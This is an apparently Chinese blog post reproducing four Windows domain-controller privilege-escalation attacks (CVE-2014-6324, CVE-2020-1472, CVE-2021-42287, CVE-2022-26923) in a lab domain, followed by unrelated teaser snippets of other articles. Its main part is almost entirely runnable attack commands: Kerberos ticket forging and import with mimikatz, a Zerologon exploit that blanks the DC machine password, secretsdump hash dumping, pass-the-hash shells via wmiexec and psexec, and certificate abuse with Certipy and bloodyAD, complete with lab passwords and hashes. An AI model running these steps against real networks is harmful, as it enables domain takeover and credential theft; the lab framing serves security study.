windows 域控提权CVE-2014-6324CVE-2020-1472CVE-2021-42287CVE-2022-26923
一、CVE-2014-6324复现
环境:god.org域,两台主机,一台win2008域控,另一台web服务器win2008
工具:ms14-068.exe(漏洞exp) mimikatz psexec
利用条件:
1.域用户账号密码
2.获得一台主机权限(本地administrator)
复现:
获取sid号
whoami /user
获取域控制器地址
net time /domain
利用exp,生成一个高权限票据:
ms14-068.exe -u mary@god.org -p admin!@#45 -s S-1-5-21-1218902331-2157346161-1782232778-1132 -d OWA2010CN-God.god.org
生成的票据
链接域控的c盘,没导入票据之前是失败的
dir \\OWA2010CN-God.god.org\C$
使用mimikatz导入票据:
kerberos::list #查看当前会话
kerberos::pure #清空会话
kerberos::ptc "TGT_test02@test.lab.ccache" #导入票据
dir \\OWA2010CN-God.god.org\C$
使用psexec返回域控cmd的会话
psexec \\OWA2010CN-God.god.org cmd
正常来说webadmin域用户是不能登录域控的
为什么需要获得主机权限:
本地管理员提权成功后,可以导出相应的hash
域用户提权失败
二、CVE-2020-1472复现
环境:god.org域,两台主机,一台win2008域控,kali2022
工具包:
impacket-0.10.0
复现:
nbtscan -v -h 192.168.3.21
检测漏洞是否存在:
python zerologon_tester.py OWA2010CN-GOD 192.168.3.21
重置空密码:
python cve-2020-1472-exploit.py OWA2010CN-GOD 192.168.3.21
连接后导出hash:
python secretsdump.py god.org/OWA2010CN-GOD\$@192.168.3.21 -no-pass
WMI连接反弹:
python wmiexec.py god/administrator@192.168.3.21 -hashes ad3b435b51404eeaad3b435b51404ee:ccef208c6485269c20db2cad21734fe7
成功提权为域管理员:
三、CVE-2021-42287复现
前提:
一个域用户账号和密码
环境:god.org域,两台主机,一台win2008域控,另一台kali
工具:sam-the-admin
下载:https://github.com/WazeHell/sam-the-admin
复现:
python sam_the_admin.py god/'webadmin:admin!@#45' -dc-ip 192.168.3.21 -shell
提权成功:
四、CVE-2022-26923复现
环境:有域 有证书服务器的win2016,kali2022,kali作为攻击机,win2016为域控
利用前提:
1.一个普通域用户账号
2.有证书服务器
环境准备:
需要用到工具包:
Certipy-main GitHub - ly4k/Certipy: Tool for Active Directory Certificate Services enumeration and abuse
impacket-0.10.0
GitHub - fortra/impacket: Impacket is a collection of Python classes for working with network protocols.
bloodyAD-main
GitHub - CravateRouge/bloodyAD: BloodyAD is an Active Directory Privilege Escalation Framework
impacket-0.10.0安装:
pip install impacket -i https://pypi.tuna.tsinghua.edu.cn/simple some-package
pip install .
Certipy-main 安装:
python setup.py install
#网不好时会下载不成功,另一种方法
#将要下载的包写成1.txt
pip install -r 1.txt -i https://pypi.tuna.tsinghua.edu.cn/simple some-package
检测证书时出现错误:
将证书服务器密钥加密换成sha-1即可
环境搭建参考链接:
CVE-2022-26923 Windows域提权漏洞 - 爱码网 (likecs.com)
复现:
在win2016新建了一个用户test
用户名:test
密码:Huawei@123
获取CA结构名和计算机名
certutil -config - -ping
或者:
net time #获取计算机名
certutil -CA#获取证书名
在kali的本地hosts中添加以下内容
192.168.85.110 l.com
192.168.85.110 WIN-SPGLPTOHACC.l.com
192.168.85.110 l-WIN-SPGLPTOHACC-CA
进行联通性测试:
ping l.com
申请证书
certipy req 'l.com/test:Huawei@123@WIN-SPGLPTOHACC.l.com' -ca l-WIN-SPGLPTOHACC-CA -template User -debug
检测证书
certipy auth -pfx test.pfx
添加用户:
python bloodyAD.py -d l.com -u test -p 'Huawei@123' --host 192.168.85.110 addComputer pwnmachine 'CVEPassword1234*'
设置属性:
python3 bloodyAD.py -d l.com -u test -p 'Huawei@123' --host 192.168.85.110 setAttribute 'CN=pwnmachine,CN=Computers,DC=l,DC=com' dNSHostName '["WIN-SPGLPTOHACC.l.com"]'
申请证书:
certipy req 'l.com/pwnmachine$:CVEPassword1234*@192.168.85.110' -ca l-WIN-SPGLPTOHACC-CA -template Machine -dc-ip 192.168.85.110
检测证书:
certipy auth -pfx ./win-spglptohacc.pfx -dc-ip 192.168.85.110
获取所有HASH,hash使用的是上方检测证书的hash值:
python secretsdump.py 'l.com/win-spglptohacc$@WIN-SPGLPTOHACC.l.com' -hashes :dd3501bcbf236920c878aeebe2e77a6e
没有l.com/admininstrator的hash,就用aministrator的hash,利用HASH:
python wmiexec.py l.com/administrator@192.168.85.110 -hashes 53bd0647e27f1474ec38eb7920029d115bfe1f7d1415bb473eb5a99b33bc7b79
成功获取域管理员权限
相关文章:
windows 域控提权CVE-2014-6324CVE-2020-1472CVE-2021-42287CVE-2022-26923
一、CVE-2014-6324复现 环境:god.org域,两台主机,一台win2008域控,另一台web服务器win2008 工具:ms14-068.exe(漏洞exp) mimikatz psexec 利用条件: 1.域用户账号密码 2.获得一台主机权限(本地administ…...
1、JDK 安装 Java环境变量配置
jdk下载(Java8) (下载时间不同,小版本号会有变化,不影响后续安装) 官网下载地址:https://www.oracle.com/java/technologies/downloads/#java8-windows 下载完后安装 JDK 环境变量配置 Win…...
[c++]list模拟实现
目录 前言: 学习类的方式: 1 类成员变量 1.1 list成员变量 1.2 结点结构体变量 1.3 迭代器成员变量 2 默认函数——构造 2.1 结点结构体构造函数 2.2 list构造函数 2.3 迭代器构造函数 3 迭代器实现 3.1 list部分 3.2 迭代器结构体部分 3.2…...
实用的仓库管理软件有哪些,盘点2023年5大仓库管理软件!
对于做批发生意的老板或工厂老板来说,选择一款实用的仓库管理软件是至关重要的。仓库管理软件除了可以帮你降低仓库管理成本,提高经营管理的效率,还能够在手机上随时随地掌控仓库员工和商品的最新信息,与客户、供应商的订单情况能…...
透彻研究通过explain命令得到的SQL执行计划(1))
(八十二)透彻研究通过explain命令得到的SQL执行计划(1)
今天我们正式进入研究explain命令得到的SQL执行计划的内容了,只要把explain分析得到的SQL执行计划都研究透彻,完全能看懂,知道每个执行计划在底层是怎么执行的,那么后面学习SQL语句的调优就非常容易了。 首先,我们现在…...
【Linux】旋转锁 | 读写锁
在之前的线程学习中,用到的锁都是挂起等待锁,如果申请不到锁,那就会在锁中等待; 自旋锁则不大相似 文章目录1.自旋锁1.1 概念1.2 接口1.2.1 pthread_spin_init/destroy1.2.2 pthread_spin_lock1.2.3 pthread_spin_unlock2.读写锁…...
EasyExcell导出excel添加水印
EasyExcell导出excel添加水印1、添加easyExcel相关依赖2、准备基础工具类3、创建水印handler类4、创建单元测试类WriteTest.class5、测试结果1、添加easyExcel相关依赖 <dependency><groupId>org.apache.poi</groupId><artifactId>poi</artifactId&…...
SpringCloud:Nacos配置管理
Nacos除了可以做注册中心,同样可以做配置管理来使用。 1.1.统一配置管理 当微服务部署的实例越来越多,达到数十、数百时,逐个修改微服务配置就会让人抓狂,而且很容易出错。我们需要一种统一配置管理方案,可以集中管理…...
正则表达式引擎NFA自动机的回溯解决方案总结
前几天线上一个项目监控信息突然报告异常,上到机器上后查看相关资源的使用情况,发现 CPU 利用率将近 100%。通过 Java 自带的线程 Dump 工具,我们导出了出问题的堆栈信息。 我们可以看到所有的堆栈都指向了一个名为 validateUrl 的方法&#…...
卷积神经网络之AlexNet
目录概述AlexNet特点激活函数sigmoid激活函数ReLu激活函数数据增强层叠池化局部相应归一化DropoutAlexnet网络结构网络结构分析AlexNet各层参数及其数量模型框架形状结构关于数据集训练学习keras代码示例概述 由于受到计算机性能的影响,虽然LeNet在图像分类中取得了…...
React中setState什么时候是同步的,什么时候是异步的?
本文内容均针对于18.x以下版本 setState 到底是同步还是异步?很多人可能都有这种经历,面试的时候面试官给了你一段代码,让你说出输出的内容,比如这样: constructor(props) {super(props);this.state {val: 0}}compo…...
优秀开源软件的类,都是怎么命名的?
日常编码中,代码的命名是个大的学问。能快速的看懂开源软件的代码结构和意图,也是一项必备的能力。 Java项目的代码结构,能够体现它的设计理念。Java采用长命名的方式来规范类的命名,能够自己表达它的主要意图。配合高级的 IDEA&…...
绘制CSP的patterns矩阵图
最近在使用FBCSP处理数据,然后就想着看看处理后的样子,用地形图的形式表现出来,但是没有符合自己需求的函数可以实现,就自己尝试的实现了一下,这里记录一下,方便以后查阅。 绘制CSP的patterns矩阵图 对数据做了FBCSP处理,但是想画一下CSP计算出来的patterns的地形图,并…...
Datatables展示数据(表格合并、日期计算、异步加载数据、分页显示、筛选过滤)
系列文章目录 datatable 自定义筛选按钮的解决方案Echarts实战案例代码(21):front-endPage的CJJTable前端分页插件ajax分页异步加载数据的解决方案 文章目录系列文章目录前言一、html容器构建1.操作按钮2.表格构建二、时间日期计算三、dataTables属性配置1.调用2.过…...
Python decimal模块的使用
Python decimal 模块Python中的浮点数默认精度是15位。Decimal对象可以表示任意精度的浮点数。getcontext函数用于获取当前的context环境,可以设置精度、舍入模式等参数。#在context中设置小数的精度 decimal.getcontext().prec 100通过字符串初始化Decimal类型的变…...
pycharm常用快捷键
编辑类: Ctrl D 复制选定的区域或行 Ctrl Y 删除选定的行 Ctrl Alt L 代码格式化 Ctrl Alt O 优化导入(去掉用不到的包导入) Ctrl 鼠标 简介/进入代码定义 Ctrl / 行注释 、取消注释 Ctrl 左方括号 快速跳到代码开头 Ctrl 右方括…...
useCallback 与 useMemo 的区别 作用
useCallback 缓存钩子函数,useMemo 缓存返回值(计算结果)。 TS声明如下:type DependencyList ReadonlyArray<any>;function useCallback<T extends (...args: any[]) > any>(callback: T, deps: DependencyList)…...
Mybatis的学习
01-mybatis传统dao开发模式 概述 mybatis有两种使用模式: ①传统dao开发模式, ②dao接口代理开发模式 ①传统dao开发模式 dao接口 dao实现子类 mapper映射文件dao实现子类来决定了dao接口的方法和mapper映射文件的statement的关系 代码实现 public class StudentDaoImpl im…...
PyTorch深度学习实战 | 计算机视觉
深度学习领域技术的飞速发展,给人们的生活带来了很大改变。例如,智能语音助手能够与人类无障碍地沟通,甚至在视频通话时可以提供实时翻译;将手机摄像头聚焦在某个物体上,该物体的相关信息就会被迅速地反馈给使用者&…...
436. 寻找右区间(2023.03.10))
力扣(LeetCode)436. 寻找右区间(2023.03.10)
给你一个区间数组 intervals ,其中 intervals[i] [starti, endi] ,且每个 starti 都 不同 。 区间 i 的 右侧区间 可以记作区间 j ,并满足 startj > endi ,且 startj 最小化 。 返回一个由每个区间 i 的 右侧区间 在 interv…...
京城汤泉夜宿体验:寻找最舒适的放松之地
引言在快节奏的城市生活中,越来越多的人开始追求一种能够彻底放松身心的方式。洗浴汤泉作为其中的一种选择,以其独特的魅力吸引了众多都市人。本文将带您走进京城的洗浴汤泉世界,特别介绍合韵汤泉,帮助您找到最适合自己的放松之地…...
)
ChatGPT 2026新增“因果推理引擎”功能(OpenAI内部白皮书首次公开)
更多请点击: https://intelliparadigm.com 第一章:ChatGPT 2026“因果推理引擎”功能全景概览 ChatGPT 2026 引入的“因果推理引擎”(Causal Reasoning Engine, CRE)标志着大语言模型从关联统计迈向可解释性因果建模的关键跃迁。…...
Tinke:免费开源NDS游戏资源提取工具,轻松解密任天堂DS游戏文件
Tinke:免费开源NDS游戏资源提取工具,轻松解密任天堂DS游戏文件 【免费下载链接】tinke Viewer and editor for files of NDS games 项目地址: https://gitcode.com/gh_mirrors/ti/tinke 你是否曾好奇NDS游戏内部藏着什么秘密?想要提取…...
IO:为专业开发者打造的AI编程助手架构解析与实战指南
1. 项目概述:IO,一个为专业开发者打造的AI编程助手如果你和我一样,每天大部分时间都在和代码、终端、以及各种开发工具打交道,那你一定理解那种对“流畅感”的渴望。我们需要的不是一个只会回答问题的聊天机器人,而是一…...
Sora 2如何“唤醒”3D Gaussian Splatting?:从神经辐射场到毫秒级动态场景生成的4层技术跃迁解析
更多请点击: https://intelliparadigm.com 第一章:Sora 2与3D Gaussian Splatting融合的范式革命 传统视频生成模型受限于体素网格或NeRF隐式表示的计算开销与几何保真度瓶颈,而Sora 2通过引入时空一致性token压缩机制,与3D Gaus…...
为OpenClaw智能体工作流配置Taotoken作为统一的模型调用后端
🚀 告别海外账号与网络限制!稳定直连全球优质大模型,限时半价接入中。 👉 点击领取海量免费额度 为OpenClaw智能体工作流配置Taotoken作为统一的模型调用后端 对于使用OpenClaw框架构建AI智能体的开发者而言,一个稳定…...
初次使用Taotoken平台从注册到完成API调用的全程指引
🚀 告别海外账号与网络限制!稳定直连全球优质大模型,限时半价接入中。 👉 点击领取海量免费额度 初次使用Taotoken平台从注册到完成API调用的全程指引 对于初次接触大模型API的开发者而言,从注册平台到成功发出第一个…...
VS2019/2022插件安装指南:让CppCheck帮你揪出C++代码里那些编译器发现不了的‘幽灵Bug’
VS2019/2022插件安装指南:让CppCheck帮你揪出C代码里那些编译器发现不了的‘幽灵Bug’ 在C开发中,编译器能捕捉语法错误,但那些潜伏在逻辑深处的"幽灵Bug"——内存泄漏、未初始化变量、数组越界——往往要等到运行时才暴露。CppCh…...
打造高效命令行天气查询工具:基于KMI/IRM的比利时天气CLI实践
1. 项目概述:一个为终端而生的比利时天气查询工具 如果你和我一样,是个重度命令行用户,同时又对窗外天气是晴是雨有点在意,那你肯定也烦透了为了看个天气预报还得打开浏览器、点开某个天气网站或者解锁手机。这种打断工作流的感觉…...
NodeMCU PyFlasher:ESP8266图形化固件烧录终极解决方案
NodeMCU PyFlasher:ESP8266图形化固件烧录终极解决方案 【免费下载链接】nodemcu-pyflasher Self-contained NodeMCU flasher with GUI based on esptool.py and wxPython. 项目地址: https://gitcode.com/gh_mirrors/no/nodemcu-pyflasher 对于ESP8266开发者…...